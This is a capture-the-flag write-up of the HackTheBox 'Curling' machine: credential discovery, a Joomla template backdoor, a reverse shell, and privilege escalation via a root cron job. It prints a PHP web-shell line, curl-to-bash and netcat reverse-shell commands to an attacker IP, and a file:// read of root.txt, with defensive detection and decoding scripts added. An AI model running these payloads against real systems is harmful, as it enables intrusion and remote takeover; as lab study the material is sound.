WriteUp: Intro to Dante – Curling 6/6

In this post we will talk about Curling, the sixth and last challenge from the HTB Track “Intro to Dante”.

Curling Banner

TL;DR

The attack kill chain can be mapped to the following steps:

  • Enumerate the web service;
  • Floris credential exposed in secret.txt;
  • Backdooring the index.php page with a web shell;
  • Reverse shell achieved through the web shell;
  • Compromising the Floris user by abusing a backup password file;
  • Abusing a privileged scheduled routine to read the root.txt file

Reconnaissance and Enumeration

Port Enumeration

Nmap Results

Enumeration – HTTP 80/TCP

During the HTTP enumeration, it is possible to deduce that CeWL could be used to generate a wordlist based on the website contents. I tried this approach but without success; later I discovered the curling2018 string on the index page, which is almost the Floris credential.

Username Floris at index.php

A source code inspection reveals the secret.txt file.

Commentary exposed in index.php related to a txt file
Content of secret.txt

The content of secret.txt is base64-encoded; after decoding it, the password for Floris is obtained.

Decoding base64 password

Initial Access

With the password obtained from secret.txt, the attacker manages to authenticate to the Joomla application with administrative privileges. Inside the administrative dashboard, the attacker edits the index.php of the Protostar template used by the Joomla application.

system($_POST['cmd']);
Backdooring index.php with a web shell

To use the web shell, the attacker sends a POST request to index.php, passing commands to the target machine through the cmd parameter.

curl -s -X POST  http://10.10.10.150/index.php --data 'cmd=curl%20http://10.10.14.4/shell|bash' -H "User-Agent: fuck" | head -n 10
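The backdoor above is a one-line edit to a template file that Joomla itself never changes, so two cheap defensive controls catch it: a hash baseline of the templates directory (any drift is suspicious) and a pattern scan for execution functions fed directly from request superglobals. The script below is an added example written for this post, not code from the original writeup or from Joomla; the template layout, the clean index.php contents and the protostar directory name in the demo are constructed, and the pattern list is a starting point rather than a complete webshell signature set.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Execution/eval functions fed straight from a request superglobal,
# e.g. system($_POST['cmd']) as described in the writeup.
EXEC_FUNCS = r"(?:system|exec|shell_exec|passthru|popen|proc_open|eval|assert)"
SUPERGLOBAL = r"\$_(?:POST|GET|REQUEST|COOKIE)\b"
WEBSHELL_RE = re.compile(rf"\b{EXEC_FUNCS}\s*\(\s*{SUPERGLOBAL}", re.IGNORECASE)


def scan_php_source(source: str) -> list[tuple[int, str]]:
    """Return (line_number, matched_text) for every webshell-style call."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for m in WEBSHELL_RE.finditer(line):
            hits.append((lineno, m.group(0)))
    return hits


def scan_template_dir(root: str) -> dict[str, list[tuple[int, str]]]:
    """Scan every .php file under a template root; keys are relative paths."""
    findings = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = scan_php_source(path.read_text(errors="replace"))
        if hits:
            findings[str(path.relative_to(root))] = hits
    return findings


def hash_tree(root: str) -> dict[str, str]:
    """SHA-256 of every file under root, keyed by relative path (the baseline)."""
    return {
        str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(Path(root).rglob("*"))
        if p.is_file()
    }


def diff_baseline(baseline: dict[str, str], current: dict[str, str]) -> list[str]:
    """Files whose hash changed, or which appeared or disappeared since the baseline."""
    return sorted(k for k in baseline.keys() | current.keys() if baseline.get(k) != current.get(k))


# Constructed stand-in for a clean template index.php (not the real Protostar file).
CLEAN_INDEX = (
    "<?php\n"
    "defined('_JEXEC') or die;\n"
    "$app = JFactory::getApplication();\n"
    "?>\n"
    "<html><body>template body</body></html>\n"
)
# The line the writeup describes being added to the template.
BACKDOOR_LINE = "system($_POST['cmd']);\n"


def demo() -> tuple[list[str], dict[str, list[tuple[int, str]]]]:
    """Baseline a constructed templates tree, tamper with it, then detect the change."""
    with tempfile.TemporaryDirectory() as tmp:
        idx = Path(tmp, "templates", "protostar", "index.php")
        idx.parent.mkdir(parents=True)
        idx.write_text(CLEAN_INDEX)
        baseline = hash_tree(tmp)

        # Simulate the modification made through the admin template editor.
        idx.write_text(CLEAN_INDEX.replace("?>\n", BACKDOOR_LINE + "?>\n", 1))

        changed = diff_baseline(baseline, hash_tree(tmp))
        findings = scan_template_dir(tmp)
        return changed, findings


if __name__ == "__main__":
    changed_files, shell_hits = demo()
    print("changed since baseline:", changed_files)
    for rel, hits in shell_hits.items():
        for lineno, text in hits:
            print(f"{rel}:{lineno}: {text}")
```

In production the baseline would be taken right after deployment and stored outside the web root (or in the monitoring system), and the scan would run from cron or a file-integrity tool rather than from a temporary directory; the pattern scan is the fallback for cases where no baseline exists.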

To obtain a reverse shell, the attacker creates a file called shell and serves it with Python's http.server.

cat shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.4 443 >/tmp/f
python3 -m http.server 80

When the curl request is processed by the target machine, a GET request for /shell arrives at the attacker's web server, followed by the reverse connection itself.

Reverse shell as www-data

Privilege Escalation – www-data to Floris

With the reverse shell as the www-data user, the attacker starts the privilege escalation routine. linPEAS.sh and linux-exploit-suggester.sh are used to perform the enumeration.

python3 -c 'import pty;pty.spawn("/bin/bash");'
curl http://10.10.14.4/linpeas.sh | bash | tee -a /tmp/.out-ln
Results from linPEAS

The password_backup file contains a hex dump of some unknown file. Its content was copied and pasted to the attacker machine.

cat password_backup | xxd -r | bzip2 -d - | gzip -d -  | bzip2 -d -
Extracting password_backup
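The pipeline above hard-codes the layer order (bzip2, gzip, bzip2) that the author worked out by hand. The Python below is an added example, not from the original writeup, that reverses an xxd-style dump and then peels compression layers by magic bytes until no known container remains, so the same code works whatever order the layers come in. The sample dump is constructed inside the script from a made-up string (the real password_backup content is not reproduced here); the parser assumes xxd's default 16-bytes-per-line layout.

```python
import bz2
import gzip

# Constructed plaintext, not the password from the box.
PLAINTEXT = b"constructed-sample-password\n"


def xxd_dump(data: bytes) -> str:
    """Format bytes the way `xxd` does: offset, 16 bytes in 2-byte groups, ASCII column."""
    lines = []
    for off in range(0, len(data), 16):
        chunk = data[off:off + 16]
        groups = [chunk[i:i + 2].hex() for i in range(0, len(chunk), 2)]
        hexpart = " ".join(groups).ljust(39)          # 8 groups * 4 chars + 7 spaces
        ascii_part = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{off:08x}: {hexpart}  {ascii_part}")
    return "\n".join(lines) + "\n"


def xxd_reverse(dump: str) -> bytes:
    """Equivalent of `xxd -r` for the default layout: read the fixed-width hex column."""
    out = bytearray()
    for line in dump.splitlines():
        if ":" not in line:
            continue
        hexpart = line.split(":", 1)[1][1:40]       # skip the space, take 39 hex-column chars
        out += bytes.fromhex(hexpart.replace(" ", ""))
    return bytes(out)


# (magic prefix, layer name, decompressor) for the containers seen in this box.
MAGICS = [
    (b"BZh", "bzip2", bz2.decompress),
    (b"\x1f\x8b", "gzip", gzip.decompress),
]


def unwrap_layers(blob: bytes, max_layers: int = 16) -> tuple[bytes, list[str]]:
    """Strip nested compression layers by magic bytes; return payload and the layer order found."""
    layers = []
    for _ in range(max_layers):
        for magic, name, decompress in MAGICS:
            if blob.startswith(magic):
                blob = decompress(blob)
                layers.append(name)
                break
        else:
            return blob, layers                       # no known magic left: done
    raise ValueError("too many nested layers; refusing to continue")


def make_sample_dump() -> str:
    """Build a dump with the same nesting as the writeup: bzip2(gzip(bzip2(plaintext)))."""
    wrapped = bz2.compress(gzip.compress(bz2.compress(PLAINTEXT)))
    return xxd_dump(wrapped)


def recover_from_hexdump(dump: str) -> tuple[bytes, list[str]]:
    return unwrap_layers(xxd_reverse(dump))


if __name__ == "__main__":
    payload, order = recover_from_hexdump(make_sample_dump())
    print("layers:", " -> ".join(order))
    print("payload:", payload.decode(errors="replace").strip())
```

The max_layers guard matters when running this over untrusted files: a deliberately nested archive can otherwise keep the loop busy or exhaust memory.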

Privilege Escalation – Floris to Root

With the password from password_backup in clear text, the attacker is able to authenticate as Floris.

Using su - to authenticate as the floris user

It is also possible to authenticate as Floris through the SSH service on port 22/TCP.

With Floris's privileges, the attacker reads user.txt, located at /home/floris/user.txt.

User.txt

Enumeration

As the Floris user, the contents of admin-area are accessible. Inspecting the files, the input file looks like a variable declaration and the report file looks like the contents of the web page.

Admin-Area files

While inspecting the running processes, the attacker discovers a cleanup routine executed by the root user that targets the admin-area directory.

Administrative routine

Based on that, the attacker replaces the content of the input file with malicious instructions that make the routine read the root.txt file from the root directory.

echo 'url = "file:///root/root.txt"' > input
cat report
Overwriting the input file with malicious instructions

Conclusions

  • Pretty straightforward box;
  • CeWL is something I really don’t use nowadays, so I think there are two ways to compromise the Joomla administrative dashboard;
  • I didn’t manage to get a root shell. I read some writeups about this box and someone managed it by exploiting the Dirty Sock vulnerability, but I don’t think this is the official way. I will leave this topic open for the future.
